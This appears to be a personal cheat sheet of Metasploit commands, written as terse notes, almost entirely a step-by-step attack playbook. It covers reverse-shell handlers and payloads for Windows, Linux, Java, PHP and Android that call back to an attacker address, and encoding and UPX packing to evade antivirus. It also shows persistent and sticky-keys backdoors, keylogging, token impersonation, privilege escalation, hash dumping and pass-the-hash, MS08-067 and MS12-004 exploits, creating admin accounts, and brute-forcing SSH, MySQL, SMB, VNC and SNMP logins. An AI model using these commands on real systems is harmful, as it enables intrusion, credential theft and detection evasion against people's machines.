Metasploit Applications

>use exploit/multi/handler

>set payload windows/meterpreter/reverse_tcp

>show options

>set LHOST 192.168.48.133

>set LPORT 1111

>run

// run the generated backdoor on the target machine

>run metsvc -A

>use exploit/multi/handler

>set payload windows/metsvc_bind_tcp

>set LPORT 31337

>set RHOST 192.168.48.130

>exploit

>getuid

// requires a program with server (service) capability to run; tested on Win2003

>net user

// a backdoor that records passwords via keylogging is relatively safe

>keyscan_start

>keyscan_dump

// upload a Shift (sticky keys) backdoor, overwriting the original hotkey program

>shell


>search keylogger

>use auxiliary/server/capture/http_javascript_keylogger

>show options

>set DEMO true

>set URIPATH /

>set srvport 80

>run

// a URL is generated


#msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -e x86/shikata_ga_nai -t exe > 123.exe

// check the generated malware against the multi-engine scanner at www.virus.org

#msfencode -l

// list the available encoders

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R |msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe

#msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai -k -c 10

#upx -5 /1231.exe

// pack the executable with UPX


>run get_local_subnets

>run autoroute -s 192.168.48.0/24

>run autoroute -p

>use incognito

>list_tokens -u

>impersonate_token ADMIN-66DDA0F56\\wing

>shell

No domain environment here (so no domain tokens are listed)

>sessions

>use auxiliary/sniffer/psnuffle

// sniff FTP passwords


>show payloads

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=1234 X > /123.exe

Copy 123.exe onto the Windows host

msf>search handler

msf>use exploit/multi/handler

msf>show options

msf>set payload windows/meterpreter/reverse_tcp

msf>show options

msf>set LHOST 192.168.48.130

msf>set LPORT 1234

msf>exploit

#msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.48.130 LPORT=4321 X > linux

#chmod 777 linux

#./linux

#msfpayload java/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=1111 W > 123.jar

#msfpayload php/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=2222 R | msfencode -e php/base64 -t raw -o 123.php

#msfpayload android/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=3333 R > 1.apk


sessions

// establish a session

search 14-002

use exploit/windows/local/ms_ndproxy

sessions

show options

set session 1

exploit

getuid

getsystem


use exploit/windows/smb/psexec

set RHOST 192.168.48.129

set SMBUSER wing

exploit

hashdump

exit

set SMBPass <hash value>

// log in directly with the hash value

exploit


Start MySQL

Enable SSH

search mysql_login

use auxiliary/scanner/mysql/mysql_login

show options

set RHOSTS 127.0.0.1

set USERNAME root

set PASS_FILE /root/1.txt

set THREADS 50

show options

exploit

mysql -u root -p

search ssh_login

use auxiliary/scanner/ssh/ssh_login

show options

set RHOSTS 127.0.0.1

set USERNAME root

set PASS_FILE /root/1.txt

set THREADS 50

exploit

search ftp_login


search 12-004

use exploit/windows/browser/ms12_004_midi

show options

set SRVHOST 192.168.48.130

exploit

set URIPATH /

show options

exploit

set LPORT 1234

show options

exploit

sessions -i 1

shell

ipconfig


search 08-067

use exploit/windows/smb/ms08_067_netapi

set RHOST 192.168.48.129

show options

show payloads

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.48.130

show options

info

nmap -O 192.168.48.129

show targets

set target 17

show options

exploit

shell

whoami

net user admin admin /add

net user admin /del


A plugin for detecting some lightweight web vulnerabilities

load wmap

wmap_sites

wmap_sites -a http://www.0day.co

wmap_sites -l

wmap_targets -t http://210.209.122.31

wmap_run -h

wmap_run -t

wmap_run -e


load wmap

wmap_vulns -l

vulns

guohh · 2017-02-10 · Metasploit WMAP

use auxiliary/scanner/vnc/vnc_auth

show options

set RHOSTS 192.168.126.0/24

set THREADS 50

run

use auxiliary/scanner/smb/smb_login

show options

set RHOSTS 192.168.126.0/24

set SMBUser administrator

set THREADS 10

run

guohh · 2017-02-10 · SMB login verification

search snmp

use auxiliary/scanner/snmp/snmp_login

show options

set RHOSTS 192.168.126.131

set THREADS 10

run

use auxiliary/scanner/snmp/snmp_enum

show options

set THREADS 10


use auxiliary/sniffer/psnuffle

Just run it directly


use auxiliary/scanner/ssh/ssh_version

use auxiliary/scanner/ftp/ftp_version


use auxiliary/scanner/smb/smb_version

set RHOSTS 192.168.126.1-200

run


nmap -v -sV 192.168.1.1

search portscan

use auxiliary/scanner/portscan/syn

show options

run


use auxiliary/scanner/portscan/tcp


wmap is enabled with the command load wmap, and is used to scan for web vulnerabilities


The SMB login check verifies logins against the target's IP address with the given account and password; it automatically probes port 445

use